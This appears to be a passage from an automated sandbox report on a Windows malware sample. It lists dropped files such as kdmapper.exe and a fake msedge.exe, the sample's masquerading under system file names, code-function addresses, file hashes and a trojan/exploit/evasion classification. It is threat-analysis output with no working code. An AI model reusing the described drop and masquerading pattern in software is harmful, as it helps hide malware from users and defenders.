raits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,DefWindowProcA,LoadIconA,LoadCursorA,LoadIconA,GetDesktopWindow,GetWindowRect,RegisterClassExA,CreateWindowExA,SetWindowLongA,DwmExtendFrameIntoClientArea,ShowWindow,SetWindowPos,SetLayeredWindowAttributes,UpdateWindow,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,

0_2_00007FF68B4C3ED0

Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B4BD0	0_2_00007FF68B4B4BD0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4CA2A0	0_2_00007FF68B4CA2A0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B4300	0_2_00007FF68B4B4300
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B4760	0_2_00007FF68B4B4760
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C3ED0	0_2_00007FF68B4C3ED0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B48F480	0_2_00007FF68B48F480
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4AE4B0	0_2_00007FF68B4AE4B0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B49D470	0_2_00007FF68B49D470
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4BECD0	0_2_00007FF68B4BECD0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4824F0	0_2_00007FF68B4824F0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4A0BA0	0_2_00007FF68B4A0BA0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B498BA0	0_2_00007FF68B498BA0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B9B40	0_2_00007FF68B4B9B40
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B499250	0_2_00007FF68B499250
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4AEA70	0_2_00007FF68B4AEA70
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4A3A70	0_2_00007FF68B4A3A70
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4CBAFC	0_2_00007FF68B4CBAFC
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4BB2D0	0_2_00007FF68B4BB2D0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B49A2F0	0_2_00007FF68B49A2F0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4A5990	0_2_00007FF68B4A5990
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4AA160	0_2_00007FF68B4AA160
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B490960	0_2_00007FF68B490960
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4A5220	0_2_00007FF68B4A5220
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4AF040	0_2_00007FF68B4AF040
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B49A040	0_2_00007FF68B49A040
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B48B875	0_2_00007FF68B48B875
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4CA0D0	0_2_00007FF68B4CA0D0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B49F8F0	0_2_00007FF68B49F8F0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4997A0	0_2_00007FF68B4997A0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B49A800	0_2_00007FF68B49A800
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B494820	0_2_00007FF68B494820
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4A1690	0_2_00007FF68B4A1690
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C268B	0_2_00007FF68B4C268B
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B48E680	0_2_00007FF68B48E680
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B490E80	0_2_00007FF68B490E80
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C267F	0_2_00007FF68B4C267F
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4A7680	0_2_00007FF68B4A7680
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C36B0	0_2_00007FF68B4C36B0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C26AF	0_2_00007FF68B4C26AF
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C269D	0_2_00007FF68B4C269D
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C264F	0_2_00007FF68B4C264F
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4A2E50	0_2_00007FF68B4A2E50
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C2643	0_2_00007FF68B4C2643
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C2673	0_2_00007FF68B4C2673
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C2667	0_2_00007FF68B4C2667
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C265B	0_2_00007FF68B4C265B
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B2F10	0_2_00007FF68B4B2F10
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C270C	0_2_00007FF68B4C270C
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C26FD	0_2_00007FF68B4C26FD
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B7730	0_2_00007FF68B4B7730
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C2733	0_2_00007FF68B4C2733
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C272A	0_2_00007FF68B4C272A
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C271B	0_2_00007FF68B4C271B
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C26D0	0_2_00007FF68B4C26D0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B496ED0	0_2_00007FF68B496ED0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C26C1	0_2_00007FF68B4C26C1
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C26EE	0_2_00007FF68B4C26EE
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4BA6E0	0_2_00007FF68B4BA6E0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4C26DF	0_2_00007FF68B4C26DF
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4BDD90	0_2_00007FF68B4BDD90
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B0D80	0_2_00007FF68B4B0D80
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B49C550	0_2_00007FF68B49C550
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B498570	0_2_00007FF68B498570
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4A65D0	0_2_00007FF68B4A65D0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B495DF0	0_2_00007FF68B495DF0
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0015848E	5_2_0015848E
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00164088	5_2_00164088
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_001600B7	5_2_001600B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_001540FE	5_2_001540FE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00167153	5_2_00167153
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_001751C9	5_2_001751C9
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_001662CA	5_2_001662CA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_001532F7	5_2_001532F7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_001643BF	5_2_001643BF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0015C426	5_2_0015C426
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0017D440	5_2_0017D440
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0015F461	5_2_0015F461
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_001677EF	5_2_001677EF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0015286B	5_2_0015286B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0017D8EE	5_2_0017D8EE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0015E9B7	5_2_0015E9B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_001819F4	5_2_001819F4
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00166CDC	5_2_00166CDC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00163E0B	5_2_00163E0B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00174F9A	5_2_00174F9A
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0015EFE2	5_2_0015EFE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00438040	11_2_00438040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042C070	11_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00449070	11_2_00449070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00401000	11_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040B0E0	11_2_0040B0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040C080	11_2_0040C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042D150	11_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004491F0	11_2_004491F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041F193	11_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409240	11_2_00409240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042C243	11_2_0042C243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004492F0	11_2_004492F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043E2A0	11_2_0043E2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004012B3	11_2_004012B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00401359	11_2_00401359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00416361	11_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042D3CC	11_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004493D0	11_2_004493D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004483B0	11_2_004483B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004113BD	11_2_004113BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00405460	11_2_00405460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00447429	11_2_00447429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004094D7	11_2_004094D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040A4E0	11_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042B490	11_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004074B0	11_2_004074B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040B570	11_2_0040B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004366E0	11_2_004366E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041D6A0	11_2_0041D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00449700	11_2_00449700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004117C0	11_2_004117C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042F7DB	11_2_0042F7DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00408850	11_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00403890	11_2_00403890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044A8B0	11_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004488B0	11_2_004488B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00436970	11_2_00436970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0045392E	11_2_0045392E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041399C	11_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040AA00	11_2_0040AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00427AFB	11_2_00427AFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042BC50	11_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00413CC6	11_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042CCDD	11_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042CCF5	11_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00429DF2	11_2_00429DF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00437D90	11_2_00437D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040CE00	11_2_0040CE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00431E00	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00415EF6	11_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00407EB0	11_2_00407EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00427F62	11_2_00427F62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00443FA0	11_2_00443FA0
Source: C:\Edge\msedge.exe	Code function: 15_2_00007FFB4B100D80	15_2_00007FFB4B100D80
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 21_2_00007FFB4B0F0D80	21_2_00007FFB4B0F0D80
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 22_2_00007FFB4B0E0D80	22_2_00007FFB4B0E0D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FFB4B0E8E25	31_2_00007FFB4B0E8E25
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B0E0B06	37_2_00007FFB4B0E0B06
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B101225	37_2_00007FFB4B101225
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B1097E0	37_2_00007FFB4B1097E0
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B10D30A	37_2_00007FFB4B10D30A
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B10BF42	37_2_00007FFB4B10BF42
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B0D0D80	37_2_00007FFB4B0D0D80
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B0E0FC7	37_2_00007FFB4B0E0FC7
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B0E177E	37_2_00007FFB4B0E177E
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B0E11A9	37_2_00007FFB4B0E11A9
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B110B06	39_2_00007FFB4B110B06
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B100D80	39_2_00007FFB4B100D80
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B131225	39_2_00007FFB4B131225
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B1397E0	39_2_00007FFB4B1397E0
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B13D30A	39_2_00007FFB4B13D30A
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B13BF42	39_2_00007FFB4B13BF42
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B110FC7	39_2_00007FFB4B110FC7
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B11177E	39_2_00007FFB4B11177E
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B1111A9	39_2_00007FFB4B1111A9
Source: C:\Edge\msedge.exe	Code function: 41_2_00007FFB4B0C0D80	41_2_00007FFB4B0C0D80
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B100D80	42_2_00007FFB4B100D80
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B110B06	42_2_00007FFB4B110B06
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B131225	42_2_00007FFB4B131225
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B1397E0	42_2_00007FFB4B1397E0
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B13D30A	42_2_00007FFB4B13D30A
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B13BF42	42_2_00007FFB4B13BF42
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B110FC7	42_2_00007FFB4B110FC7
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B11177E	42_2_00007FFB4B11177E
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B1111A9	42_2_00007FFB4B1111A9
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B100D80	47_2_00007FFB4B100D80
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B110B06	47_2_00007FFB4B110B06
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B131225	47_2_00007FFB4B131225
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B13D30A	47_2_00007FFB4B13D30A
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B1397E0	47_2_00007FFB4B1397E0
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B13BF42	47_2_00007FFB4B13BF42
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B110FC7	47_2_00007FFB4B110FC7
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B11177E	47_2_00007FFB4B11177E
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B1111A9	47_2_00007FFB4B1111A9
Source: C:\Edge\msedge.exe	Code function: 48_2_00007FFB4B0D0D80	48_2_00007FFB4B0D0D80
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B0D0D80	55_2_00007FFB4B0D0D80
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B101225	55_2_00007FFB4B101225
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B1097E0	55_2_00007FFB4B1097E0
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B10D30A	55_2_00007FFB4B10D30A
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B10BF42	55_2_00007FFB4B10BF42
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B0E0B06	55_2_00007FFB4B0E0B06
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B0E0FC7	55_2_00007FFB4B0E0FC7
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B0E177E	55_2_00007FFB4B0E177E
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 55_2_00007FFB4B0E11A9	55_2_00007FFB4B0E11A9

Source: Joe Sandbox View	Dropped File: C:\Edge\msedge.exe 1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe 1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
Source: Joe Sandbox View	Dropped File: C:\Users\user\Desktop\DqsZwsEl.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A

Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0016F5F0 appears 31 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0016EC50 appears 56 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0016EB78 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CBE0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040EE60 appears 145 times
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: String function: 00007FF68B4BE8C0 appears 148 times

Source: WpXNITDI.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: iacMOeMk.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XmyVeTRC.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GfhqKgmo.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: 4tXm5yPtiy.exe, 00000000.00000003.1805009867.000002734FECC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVQP.exed! vs 4tXm5yPtiy.exe
Source: 4tXm5yPtiy.exe, 00000000.00000002.2679910423.000002734FED1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVQP.exed! vs 4tXm5yPtiy.exe

Source: msedge.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: physmeme.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wCnmgKwwXYQbWeNvWeCCOp.exe.15.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WpXNITDI.log.15.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: iacMOeMk.log.15.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XmyVeTRC.log.15.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: GfhqKgmo.log.15.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@85/66@18/4

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_00156C74 GetLastError,FormatMessageW,

5_2_00156C74

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

